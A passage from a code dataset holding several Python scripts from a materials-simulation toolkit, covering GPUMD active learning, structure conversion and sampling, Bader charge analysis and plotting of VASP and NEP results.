return md_path
def select_structures(train, new: Path, max_selected=20, min_distance=0.01):
# 首先去掉跑崩溃的结构
new_atoms = ase_read(new, ":", format="extxyz", do_not_split_by_at_sign=True)
new_atoms = remove_garbage_structure(new_atoms)
train_des = np.array([np.mean(get_descriptors(i, "nep.txt"), axis=0) for i in train])
new_des = np.array([np.mean(get_descriptors(i, "nep.txt"), axis=0) for i in new_atoms])
selected_i = select(np.vstack([train_des, new_des]), train_des, min_distance=min_distance, max_select=max_selected,
min_select=0)
# 画一下图
reducer = PCA(n_components=2)
reducer.fit(np.vstack([train_des, new_des]))
fig = plt.figure()
proj = reducer.transform(train_des)
plt.scatter(proj[:, 0], proj[:, 1], label='train', c="gray")
proj = reducer.transform(new_des)
plt.scatter(proj[:, 0], proj[:, 1], label='MD dataset', c="#07cd66")
if selected_i:
selected_proj = reducer.transform(np.array([new_des[i - train_des.shape[0]] for i in selected_i]))
plt.scatter(selected_proj[:, 0], selected_proj[:, 1], label='selected', c="red")
plt.legend()
plt.axis('off')
plt.savefig(new.with_name('select.png'))
plt.close(fig)
return [new_atoms[i - train_des.shape[0]] for i in selected_i]
def plot_all_structure(train_data, add_data, save_path):
train_des = np.array([np.mean(get_descriptors(i, "nep.txt"), axis=0) for i in train_data])
add_des = np.array([np.mean(get_descriptors(i, "nep.txt"), axis=0) for i in add_data])
reducer = PCA(n_components=2)
reducer.fit(np.vstack([train_des, add_des]))
fig = plt.figure()
proj = reducer.transform(train_des)
plt.scatter(proj[:, 0], proj[:, 1], label='train', c="gray")
proj = reducer.transform(add_des)
plt.scatter(proj[:, 0], proj[:, 1], label='add', c="#07cd66")
plt.legend()
plt.axis('off')
plt.savefig(save_path)
plt.close(fig)
def auto_learn(path, run_time, temperatures, max_selected, template, min_distance):
"""
主动学习迭代
首先要有一个nep.txt nep.in train.xyz
:return:
"""
# 定义迭代时间 单位ps
trainxyz = ase_read("train.xyz", ":", format="extxyz", do_not_split_by_at_sign=True)
# for epoch, run_time in enumerate(times):
logging.info(f"开始主动学习,采样时长:{run_time} ps。")
# 存放每次epoch 新增的训练集
new_atoms = []
# 进行gpumd采样
for temperature in temperatures:
# 对每个温度进行采样
logging.info(f"GPUMD采样中,温度:{temperature}k。时长:{run_time}ps")
md_paths = molecular_dynamics(path, temperature=temperature, run_time=run_time, template=template)
# 筛选出结构
for md_path in md_paths:
selected = select_structures(trainxyz + new_atoms, md_path.joinpath("dump.xyz"), max_selected=max_selected,
min_distance=min_distance)
logging.info(f"得到{len(selected)}个结构")
for i, atom in enumerate(selected):
atom.info["Config_type"] = f"{atom.symbols}-epoch-{run_time}ps-{temperature}k-{i + 1}"
new_atoms.extend(selected)
logging.info(f"本次主动学习新增了{len(new_atoms)}个结构。")
plot_all_structure(trainxyz, new_atoms, f"result/learn-epoch-{run_time}ps@{template}{GlobSuffix}.png")
ase_write(root_path.joinpath(f"result/learn-epoch-{run_time}ps@{template}{GlobSuffix}.xyz"), new_atoms,
format="extxyz")
# 然后nep训练
def prediction(self):
pass
def build_argparse():
parser = argparse.ArgumentParser(description="""GPUMD 工具.
可以批量md和主动学习 """,
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
"job_type", choices=["prediction", "md", "learn"], help="任务类型"
)
parser.add_argument(
"path", type=Path, help="要计算的xyz路径,或者要批量计算的文件夹。"
)
parser.add_argument("--time", "-t", type=int, help="分子动力学的时间,单位ps。", default=10)
parser.add_argument("--temperature", "-T", type=int, help="分子动力学的温度", nargs="*", default=[300])
parser.add_argument("--template", type=str, help="模板文件的文件名", default="nvt")
parser.add_argument("--max_selected", "-max", type=int, help="每次md最多抽取的结构", default=20)
parser.add_argument("--min_distance", type=float, help="最远点采样的最小键长", default=0.01)
parser.add_argument(
"-s", "--suffix", type=str, help="给文件夹名字以及输出文件添加一个后缀", default=""
)
return parser
if __name__ == '__main__':
# 采样
parser = build_argparse()
args = parser.parse_args()
if not os.path.exists("./result"):
os.mkdir("./result")
root_path = Path("./")
if args.suffix:
# 多节点在同一路径计算 给每个job设置一个后缀 这样可以避免数据在同一个路径下计算造成数据覆盖
GlobSuffix = f"-{args.suffix}"
else:
GlobSuffix = ""
if args.job_type == "md":
for t in args.temperature:
molecular_dynamics(args.path, temperature=t, run_time=args.time, template=args.template)
elif args.job_type == "prediction":
prediction(args.path)
elif args.job_type == "learn":
auto_learn(args.path, run_time=args.time, temperatures=args.temperature, template=args.template,
max_selected=args.max_selected, min_distance=args.min_distance)
| 12,296 | Python | .py | 281 | 33.412811 | 119 | 0.626329 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,158 | xyz2pos.py | aboys-cb_VaspTool/script/tool/xyz2pos.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/14 13:56
# @Author : å…µ
# @email : [email protected]
import sys
from ase.io import read, write
pos_path = sys.argv[1]
if len(sys.argv) == 3:
index = sys.argv[2]
else:
index = -1
write("POSCAR", read(pos_path, index=index, format="extxyz"))
| 322 | Python | .py | 13 | 22.923077 | 61 | 0.638436 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,159 | select_nep.py | aboys-cb_VaspTool/script/tool/select_nep.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/15 16:33
# @Author : å…µ
# @email : [email protected]
import matplotlib.pyplot as plt
import numpy as np
import tqdm
from ase.io import read, write
from calorine.nep import get_descriptors
from pynep.select import FarthestPointSample
from sklearn.decomposition import PCA
atoms_list = read('train.xyz', ':')
print(len(atoms_list))
screen_list = []
for atoms in atoms_list:
if (np.any(abs(atoms.calc.results["forces"]) > 15)):
continue
screen_list.append(atoms)
print(len(screen_list))
des = np.array([np.mean(get_descriptors(i, "nep.txt"), axis=0) for i in screen_list])
sampler = FarthestPointSample(min_distance=0.003)
selected_i = sampler.select(des, min_select=0)
print(len(selected_i))
for i in tqdm.tqdm(selected_i):
write('selected.xyz', screen_list[i], append=True)
reducer = PCA(n_components=2)
reducer.fit(des)
proj = reducer.transform(des)
plt.scatter(proj[:, 0], proj[:, 1], label='all data')
selected_proj = reducer.transform(np.array([des[i] for i in selected_i]))
plt.scatter(selected_proj[:, 0], selected_proj[:, 1], label='selected data')
plt.legend()
plt.axis('off')
plt.savefig('select.png')
| 1,206 | Python | .py | 35 | 32.742857 | 85 | 0.724936 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,160 | shuffle.py | aboys-cb_VaspTool/script/tool/shuffle.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/7/1 20:31
# @Author : 兵
# @email : [email protected]
import sys
from ase.io import read, write
from sklearn.utils import shuffle
path = sys.argv[1]
atoms = read(path, ":", format="extxyz")
atoms = shuffle(atoms)
print("打乱成功!")
write(path, atoms, format='extxyz')
| 347 | Python | .py | 13 | 24.461538 | 40 | 0.680251 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,161 | adsorption.py | aboys-cb_VaspTool/script/tool/adsorption.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/29 19:15
# @Author : 兵
# @email : [email protected]
"""
建模吸附模型
"""
from pymatgen.analysis.adsorption import AdsorbateSiteFinder
from pymatgen.core import Structure, Molecule
from pymatgen.core.surface import SlabGenerator
# adsorption_molecule = Molecule("HHO",
# [[7.16750, 1.59835, 8.57334
# ],
# [5.60698, 1.60212, 8.56915],
# [6.38919, 2.17224, 8.40802]])
# 这个是读取表面的原始结构 而不是slab模型
structure = Structure.from_file("./Co4.cif")
# 可以读文件 也可以直接建立
adsorption_molecule = Molecule.from_file("H1S1O5.xyz")
slab = SlabGenerator(
structure,
miller_index=(1, 1, 1), # 米勒指数
min_slab_size=8, # 最小slab
min_vacuum_size=15 #真空层大小
).get_slab().make_supercell((4, 4, 1))
finder = AdsorbateSiteFinder(slab, selective_dynamics=True)
a = finder.generate_substitution_structures("NiNi")
print(a)
all = finder.generate_adsorption_structures(adsorption_molecule,
(4, 4, 1), # 扩包比例
translate=True,
find_args={"distance": 2.5} # 将吸附物放在表面上2A的位置
)
# for i, s in enumerate(all):
# s.to(f"{i}.vasp", fmt="poscar")
| 1,517 | Python | .py | 36 | 32.166667 | 89 | 0.552184 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,162 | sub_all.py | aboys-cb_VaspTool/script/tool/sub_all.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/18 23:31
# @Author : å…µ
# @email : [email protected]
import subprocess
import sys
from pathlib import Path
path = Path(sys.argv[1])
for i in path.iterdir():
_path = i.as_posix()
cmd = ["sbatch", "sub_vasp.sh", _path]
result = subprocess.run(cmd, capture_output=True, text=True, check=True)
print(result.stdout)
| 401 | Python | .py | 14 | 26.285714 | 76 | 0.65974 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,163 | supercell.py | aboys-cb_VaspTool/script/tool/supercell.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/15 19:23
# @Author : å…µ
# @email : [email protected]
import os
from pymatgen.core import Structure
path = "./"
if not os.path.exists("./super"):
os.mkdir("./super")
for cif in os.listdir(path):
if os.path.isfile(cif) and cif.endswith("vasp"):
struct = Structure.from_file(cif)
supercell = struct.make_supercell([6, 12, 12])
supercell.to("./super/" + supercell.composition.to_pretty_string() + ".cif")
| 507 | Python | .py | 15 | 30.466667 | 84 | 0.638776 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,164 | bader.py | aboys-cb_VaspTool/script/tool/bader.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/10/8 22:39
# @Author : 兵
# @email : [email protected]
from pymatgen.command_line.bader_caller import bader_analysis_from_path
from pymatgen.core import Structure
def save_summary(summary):
with open("ACF.dat", "w", encoding="utf8") as f:
header = "Id,X,Y,Z,label,charge,transfer,min dist,atomic volume".split(",")
header = [i.center(10) for i in header]
header_text = "".join(header)
f.write(header_text)
f.write("\n")
f.write("-" * 100)
f.write("\n")
structure = Structure.from_file("POSCAR")
for index in range(len(structure)):
site = structure[index]
line = [index + 1, round(site.x, 4), round(site.y, 4), round(site.z, 4), site.label,
round(summary['charge'][index], 4),
round(summary['charge_transfer'][index], 4),
round(summary['min_dist'][index], 4),
round(summary['atomic_volume'][index], 4)]
line = [str(i).center(10) for i in line]
f.write("".join(line))
f.write("\n")
f.write("-" * 100)
f.write("\n")
f.write(f"vacuum charge : {summary['vacuum_charge']}\n")
f.write(f"vacuum volume : {summary['vacuum_volume']}\n")
f.write(f"bader version : {summary['bader_version']}\n")
if __name__ == '__main__':
print("开始bader电荷分析。")
summary = bader_analysis_from_path("./")
print("bader电荷分析完成。")
save_summary(summary)
| 1,603 | Python | .py | 37 | 33.891892 | 96 | 0.561886 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,165 | extract_xyz.py | aboys-cb_VaspTool/script/tool/extract_xyz.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/12 14:32
# @Author : 兵
# @email : [email protected]
"""
等间距抽取多少个结构在xyz文件中
每隔50抽取1个
python extract_xyz.py aimd.xyz 50
主动学习的 可以用 100k是标记 在Config_type
python extract_xyz.py dump.xyz 50 100k
"""
import argparse
import tqdm
from ase.io import read, write
def extract(file_path, num, config=None):
atoms_info = {}
atoms = read(file_path, index=":", format="extxyz")
extract = atoms[::num]
if config is not None:
for i, atom in tqdm.tqdm(enumerate(extract), total=len(extract)):
symbols = str(atom.symbols)
if symbols not in atoms_info.keys():
atoms_info[symbols] = 1
atom.info["Config_type"] = f"{symbols}-{config}-{atoms_info[symbols]}"
atoms_info[symbols] += 1
print(f"抽取到{len(extract)}个结构。")
# 这里将抽取的追加写入到微扰的里面
write(f"./extract_{file_path}.xyz", extract, format='extxyz', append=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="等间距抽取指定文件中的结构。")
parser.add_argument("filename", help="源数据文件", type=str)
parser.add_argument("step", help="每隔step抽取一个结构", type=int)
parser.add_argument("-c", "--config", help="生成Config_type.不指定则使用源数据文件的,如果没有则为空。", default=None,
type=str)
args = parser.parse_args()
extract(args.filename, args.step, args.config)
| 1,607 | Python | .py | 37 | 32.459459 | 99 | 0.651852 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,166 | pos2xyz.py | aboys-cb_VaspTool/script/tool/pos2xyz.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/13 20:18
# @Author : å…µ
# @email : [email protected]
import sys
from ase.io import read, write
pos_path = sys.argv[1]
write("model.xyz", read(pos_path), format="extxyz")
| 244 | Python | .py | 9 | 25.777778 | 51 | 0.652361 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,167 | split_train.py | aboys-cb_VaspTool/script/tool/split_train.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/14 12:00
# @Author : 兵
# @email : [email protected]
import sys
from pathlib import Path
import numpy as np
from ase.io import read, write
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
from tqdm import tqdm
if Path("train-0.9.xyz").exists():
print("当前目录下已经有train-0.9.xyz文件,将追加到文件,而不是覆盖写入。")
if Path("test-0.1.xyz").exists():
print("当前目录下已经有train-0.9.xyz文件,将追加到文件,而不是覆盖写入。")
path = Path(sys.argv[1])
if path.is_file():
files = [path]
else:
files = []
for file in path.glob("*.xyz"):
files.append(file)
count = 0
trains = []
tests = []
for file in tqdm(files, "文件分割"):
atoms_list = read(file, ":", format="extxyz")
screen_list = []
for atoms in atoms_list:
if (np.any(abs(atoms.calc.results["forces"]) > 100)):
continue
screen_list.append(atoms)
count += len(screen_list)
train, test = train_test_split(screen_list, test_size=0.1, random_state=88, shuffle=True)
# 这里append=True 考虑可以将多个体系合并下
trains.extend(train)
tests.extend(test)
trains = shuffle(trains)
tests = shuffle(tests)
write("./train-0.9.xyz", trains, format='extxyz', append=True)
write("./test-0.1.xyz", tests, format='extxyz', append=True)
print(f"数据集一共有{count}条")
| 1,486 | Python | .py | 43 | 27.744186 | 93 | 0.677067 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,168 | split_xyz.py | aboys-cb_VaspTool/script/tool/split_xyz.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/8/28 15:14
# @Author : 兵
# @email : [email protected]
# 按照间隔分割xyz 分散任务 多节点提交
# python split_xyz.py new.xyz 10
import sys
from ase.io import read, write
job_num = int(sys.argv[2])
atoms_list = read(sys.argv[1], index=":", format="extxyz", do_not_split_by_at_sign=True)
def split_list(lst, n):
k, m = divmod(len(lst), n)
return [lst[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in range(n)]
result = split_list(atoms_list, job_num)
for i, sublist in enumerate(result):
write(f"split-{i}-num-{len(sublist)}.xyz", sublist)
| 648 | Python | .py | 17 | 34 | 88 | 0.642978 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,169 | generate_perturb_structure.py | aboys-cb_VaspTool/script/tool/generate_perturb_structure.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/12 11:07
# @Author : 兵
# @email : [email protected]
"""
脚本执行方式:python generate_perturb_structure.py some_structure_path num
some_structure_path 可以是POSCAR、CONTCAR、.vasp、 文件
num是生成微扰结构的个数
"""
import sys
from pathlib import Path
import dpdata
from ase.io import write
from hiphive.structure_generation import generate_mc_rattled_structures
from tqdm import tqdm
path = Path(sys.argv[1])
if path.is_file():
files = [path]
else:
files = []
for file in path.glob("POSCAR"):
files.append(file)
for file in path.glob("*/POSCAR"):
files.append(file)
num = int(sys.argv[2])
for file in tqdm(files):
system = dpdata.System(file, "vasp/poscar")
perturbed_system = system.perturb(pert_num=int(num * 0.4),
cell_pert_fraction=0.05,
atom_pert_distance=0.1,
atom_pert_style='uniform')
structures = perturbed_system.to('ase/structure')
for structure in structures:
structure.info['Config_type'] = "dpdata perturb 0.05 0.1"
# append=True是追加写入 怕缓存影响 直接覆盖写入 如果有需要自己改成True
write(f"./perturb_{system.formula}.xyz", structures, format='extxyz', append=True)
rattle_std = 0.04
min_distance = 0.1
structures_mc_rattle = generate_mc_rattled_structures(
system.to('ase/structure')[0], int(num * 0.6), rattle_std, min_distance, n_iter=20)
for structure in structures_mc_rattle:
structure.info['Config_type'] = "hiphive mc perturb 0.04 0.1"
write(f"./perturb_{system.formula}.xyz", structures_mc_rattle, format='extxyz', append=True)
| 1,801 | Python | .py | 44 | 32.545455 | 96 | 0.656345 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,170 | plot_optic.py | aboys-cb_VaspTool/script/plot/plot_optic.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/5/22 13:07
# @Author : 兵
# @email : [email protected]
"""
绘制光吸收曲线的图
"""
import matplotlib.pyplot as plt
from pymatgen.analysis.solar.slme import absorption_coefficient, optics, slme
from pymatgen.io.vasp.outputs import Vasprun
plt.style.use("./science.mplstyle")
fig=plt.figure()
sort_name=[
("$Cs_2AgBiI_6$", "./Cs1Ag0.5Bi0.5I3.xml", 0.85),
("$Cs_2Cu_{0.25}Ag_{0.75}BiI_6$", "./Cs1Cu0.125Ag0.375Bi0.5I3.xml", 0.4618),
("$Cs_2AgBi_{0.75}Sb_{0.25}I_6$", "./Cs2AgBi0.75Sb0.25I6.xml", 0.5952)
]
for label, path, gap in sort_name:
vasp=Vasprun(path)
new_en, new_abs =absorption_coefficient(vasp.dielectric)
new_en += gap
plt.plot(new_en, new_abs,label=label)
data = optics(path)
print(data[2], data[3], slme(*data, thickness=5e-6))
plt.legend(ncol=2)
# plt.ylim(0,7)
# plt.ticklabel_format(style='sci', scilimits=(0,0))
plt.xlim(0, 5)
plt.xlabel("Photon energy (eV)")
plt.ylabel("Absorption ($cm^{-1}$)")
plt.yscale('log')
plt.savefig("./absorption_coefficient.png") | 1,095 | Python | .py | 33 | 30.272727 | 80 | 0.675676 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,171 | plot_energy_force.py | aboys-cb_VaspTool/script/plot/plot_energy_force.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/24 19:44
# @Author : 兵
# @email : [email protected]
"""
使用方式 python plot_sr_energy_force.py OUTCAR
"""
import os.path
import sys
import matplotlib.pyplot as plt
import numpy as np
from pymatgen.io.vasp.outputs import Outcar
try:
path = sys.argv[1]
except:
if os.path.exists("OUTCAR"):
print("没有传入文件路径,检测到当前目录下有OUTCAR")
path = "OUTCAR"
else:
print("没有传入文件路径,请使用python plot_energy_force.py OUTCAR ")
exit()
print("正在载入文件。。。")
out = Outcar(path)
print("开始解析能量。。。")
out.read_pattern({
"e_fr_energy": r"free energy TOTEN\s+=\s+([\d\-\.]+)",
}, postprocess=float)
energy = np.array(out.data["e_fr_energy"])
energy = energy.flatten()
print("开始解析力。。。")
a = out.read_table_pattern(r"TOTAL-FORCE \(eV/Angst\)\n\s*\-+\n", r"\s+".join([r"(\-*[\.\d]+)"] * 6), r"-*\n",
last_one_only=False, postprocess=float)
force = np.array(a)[:, :, 3:]
force = force.reshape((force.shape[0], -1))
max_froce = np.max(force, 1)
result = np.vstack([np.arange(energy.shape[0]), energy, max_froce]).T
print("正在画图。。。")
fig, axes = plt.subplots(2, 1, sharex=True)
axes1, axes2 = axes
axes1.plot(result[:, 0], result[:, 1], label="energy", color="red")
axes1.set_ylabel("energy(eV)")
axes1.legend()
axes2.plot(result[:, 0], result[:, 2], label="max force", color="green")
axes2.set_ylabel("max force")
axes2.legend()
axes2.set_xlabel("steps")
plt.tight_layout()
plt.savefig("energy_forces.png", dpi=150)
np.savetxt("energy_forces.csv", result, header="step,energy,force", fmt='%.8f', comments="")
print("导出成功!./energy_forces.csv")
| 1,805 | Python | .py | 51 | 29.764706 | 110 | 0.651819 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,172 | plot_soc.py | aboys-cb_VaspTool/script/plot/plot_soc.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/5/9 22:40
# @Author : 兵
# @email : [email protected]
import itertools
import re
from collections import defaultdict
import numpy as np
from matplotlib import pyplot as plt
from monty.io import zopen
plt.rc('font', family='Times New Roman')
# 修改公式中默认字体
from matplotlib import rcParams
rcParams['mathtext.default'] = 'regular'
import matplotlib as mpl
from pymatgen.electronic_structure.core import Spin
from pymatgen.io.vasp import BSVasprun
class Procar:
def __init__(self, filename):
"""
Args:
filename: Name of file containing PROCAR.
"""
headers = None
with zopen(filename, "rt") as file_handle:
preambleexpr = re.compile(r"# of k-points:\s*(\d+)\s+# of bands:\s*(\d+)\s+# of " r"ions:\s*(\d+)")
kpointexpr = re.compile(r"^k-point\s+(\d+).*weight = ([0-9\.]+)")
bandexpr = re.compile(r"^band\s+(\d+)")
ionexpr = re.compile(r"^ion.*")
expr = re.compile(r"^([0-9]+)\s+")
current_kpoint = 0
current_band = 0
done = False
spin = Spin.down
weights = None
# pylint: disable=E1137
for line in file_handle:
# print(line)
line = line.strip()
if bandexpr.match(line):
m = bandexpr.match(line)
# print(m.group())
current_band = int(m.group(1)) - 1
current_direction = -1
done = False
elif kpointexpr.match(line):
m = kpointexpr.match(line)
# print(m.groups())
current_kpoint = int(m.group(1)) - 1
weights[current_kpoint] = float(m.group(2))
if current_kpoint == 0:
spin = Spin.up if spin == Spin.down else Spin.down
done = False
elif headers is None and ionexpr.match(line):
headers = line.split()
headers.pop(0)
# headers.pop(-1)
data = defaultdict(lambda: np.zeros((nkpoints, nbands, nions, len(headers))))
phase_factors = defaultdict(
lambda: np.full(
(nkpoints, nbands, nions, 3, len(headers)),
np.NaN,
dtype=np.float32,
)
)
elif expr.match(line):
# print(line)
toks = line.split()
index = int(toks.pop(0)) - 1
# toks.pop(-1)
num_data = np.array([float(t) for t in toks[: len(headers)]])
# print(done)
if not done:
data[spin][current_kpoint, current_band, index, :] = num_data
else:
# for orb in range(len(["x","y","z"])):
phase_factors[spin][current_kpoint, current_band, index, current_direction, :] = num_data
elif line.startswith("tot"):
# print("tot")
current_direction += 1
done = True
elif preambleexpr.match(line):
m = preambleexpr.match(line)
nkpoints = int(m.group(1))
nbands = int(m.group(2))
nions = int(m.group(3))
weights = np.zeros(nkpoints)
self.nkpoints = nkpoints
self.nbands = nbands
self.nions = nions
self.weights = weights
self.orbitals = headers
self.data = data
self.phase_factors = phase_factors
def get_projection_on_elements(self, structure):
"""
Method returning a dictionary of projections on elements.
Args:
structure (Structure): Input structure.
Returns:
a dictionary in the {Spin.up:[k index][b index][{Element:values}]]
"""
dico = {}
for spin in self.data:
dico[spin] = [[defaultdict(float) for i in range(self.nkpoints)] for j in range(self.nbands)]
for iat in range(self.nions):
name = structure.species[iat].symbol
for spin, d in self.data.items():
# print(d.shape)
for k, b in itertools.product(range(self.nkpoints), range(self.nbands)):
dico[spin][b][k][name] = np.sum(d[k, b, iat, :])
# return
return dico
def get_spin_component_by_direction(self, direction="z"):
directions = ["x", "y", "z"]
if direction not in directions:
print("只支持x y z三个方向")
return
direction_index = directions.index(direction)
dico = {}
for spin in self.data:
dico[spin] = [[defaultdict(float) for i in range(self.nkpoints)] for j in range(self.nbands)]
for k, b in itertools.product(range(self.nkpoints), range(self.nbands)):
dico[spin][b][k] = np.sum(self.phase_factors[spin][k, b, :, direction_index, :], 0)[-1]
# print(self.phase_factors[spin][k, b, :, direction_index, :])
# print( (np.sum(self.phase_factors[spin][k, b, :, direction_index, :],0) ))
return dico
def get_occupation(self, atom_index, orbital):
"""
Returns the occupation for a particular orbital of a particular atom.
Args:
atom_num (int): Index of atom in the PROCAR. It should be noted
that VASP uses 1-based indexing for atoms, but this is
converted to 0-based indexing in this parser to be
consistent with representation of structures in pymatgen.
orbital (str): An orbital. If it is a single character, e.g., s,
p, d or f, the sum of all s-type, p-type, d-type or f-type
orbitals occupations are returned respectively. If it is a
specific orbital, e.g., px, dxy, etc., only the occupation
of that orbital is returned.
Returns:
Sum occupation of orbital of atom.
"""
orbital_index = self.orbitals.index(orbital)
return {
spin: np.sum(d[:, :, atom_index, orbital_index] * self.weights[:, None]) for spin, d in self.data.items()
}
def get_ticks(bs):
"""
Get all ticks and labels for a band structure plot.
Returns:
dict: A dictionary with 'distance': a list of distance at which
ticks should be set and 'label': a list of label for each of those
ticks.
"""
ticks, distance = [], []
for br in bs.branches:
start, end = br["start_index"], br["end_index"]
# print(br["name"])
labels = br["name"].split("-")
labels=[i for i in labels if i.strip()]
# skip those branches with only one point
if labels[0] == labels[1]:
continue
# add latex $$
for idx, label in enumerate(labels):
if label.startswith("\\") or "_" in label:
labels[idx] = "$" + label + "$"
if ticks and labels[0] != ticks[-1]:
ticks[-1] += "$\\mid$" + labels[0]
ticks.append(labels[1])
distance.append(bs.distance[end])
else:
ticks.extend(labels)
distance.extend([bs.distance[start], bs.distance[end]])
return {"distance": distance, "label": ticks}
def plot_spin_by_direction(path_dir,direction,
energy_min: float = -1,
energy_max: float = 1,):
bs_vasprun = BSVasprun(path_dir+"/vasprun.xml", parse_projected_eigen=True)
pro = Procar(path_dir+"/PROCAR")
projection_on_elements = pro.get_spin_component_by_direction(direction)
band_structure = bs_vasprun.get_band_structure(line_mode=True)
ware1,enery1,spin1 = [],[],[]
ware2,enery2,spin2 = [],[],[]
for band, projection in zip(band_structure.bands[Spin.up], projection_on_elements[Spin.up]):
for distance, energy, tot in zip(band_structure.distance, band, projection):
if tot >0:
ware1.append(distance)
enery1.append(energy - band_structure.efermi)
spin1.append(tot)
else:
ware2.append(distance)
enery2.append(energy - band_structure.efermi)
spin2.append(tot)
fig = plt.figure(figsize=(8,5))
norm = mpl.colors.Normalize(-1,1)
plt.plot([0, max(band_structure.distance)], [0, 0], 'k-.', linewidth=1)
xticks = get_ticks(band_structure)
for dis in xticks["distance"]:
plt.plot([dis,dis],[energy_min, energy_max],'k-.', linewidth=1)
plt.xticks(xticks["distance"],xticks["label"])
plt.xlim(0, max(xticks["distance"]))
a = plt.scatter(ware1, enery1,c=spin1,s=30,lw=0, alpha=0.5 ,cmap=mpl.cm.coolwarm,norm=norm, marker="o")
b = plt.scatter(ware2, enery2,c=spin2,s=20,lw=0, alpha=0.5,cmap=mpl.cm.coolwarm, norm=norm,marker="*")
plt.ylim(energy_min, energy_max)
plt.tick_params(axis='y', direction='in')
plt.colorbar( fraction=0.2, pad=0.1)
# plt.legend((a,b),("spin-up","spin-down"),fontsize=16 , frameon=False )
plt.tight_layout()
ax = plt.gca()
#处理刻度
ax.tick_params(labelsize=16,bottom=False, top=False, left=True, right=False)
plt.subplots_adjust(left=0.2, right=0.85, top=0.9, bottom=0.15, wspace=0.01, hspace=0.1)
plt.xlabel("Wavevector $k$", fontsize=16 )
plt.ylabel("$E-E_F$ / eV", fontsize=16 )
# plt.title("title",x=0.5,y=1.02)
# plt.savefig("bnd.eps",format='eps', transparent=True,bbox_inches='tight', dpi=600)
plt.savefig("band.jpg",bbox_inches='tight', dpi=1200)
if __name__ == '__main__':
#这里传入的是vasprun.xml所在的路径
plot_spin_by_direction("./danzi/vasprun/",
"z",
-2,2) | 10,164 | Python | .py | 225 | 32.915556 | 117 | 0.545649 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,173 | plot_nep.py | aboys-cb_VaspTool/script/plot/plot_nep.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/21 16:40
# @Author : å…µ
# @email : [email protected]
import glob
import os
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import numpy as np
from sklearn.metrics import r2_score, mean_squared_error
Config = [
{"name": "energy", "unit": "eV/atom"},
{"name": "force", "unit": "eV/A"},
{"name": "virial", "unit": "eV/atom"},
{"name": "stress", "unit": "GPa"},
]
def plot_loss_result(axes: plt.Axes):
loss = np.loadtxt("loss.out")
axes.loglog(loss[:, 1:7],
label=['Total', 'L1-regularization',
'L2-regularization', 'Energy-train',
'Force-train', 'Virial-train'])
axes.set_xlabel('Generation/100')
axes.set_ylabel('Loss')
if np.any(loss[7:10] != 0):
axes.loglog(loss[:, 7:10], label=['Energy-test', 'Force-test', 'Virial-test'])
axes.legend(ncol=2, frameon=False)
def plot_train_result(axes: plt.Axes, config: dict):
types = ["train", "test"]
colors = ['deepskyblue', 'orange']
xys = [(0.1, 0.7), (0.4, 0.1)]
for i in range(2):
data_type = types[i]
color = colors[i]
xy = xys[i]
if not os.path.exists(f"{config['name']}_{data_type}.out"):
continue
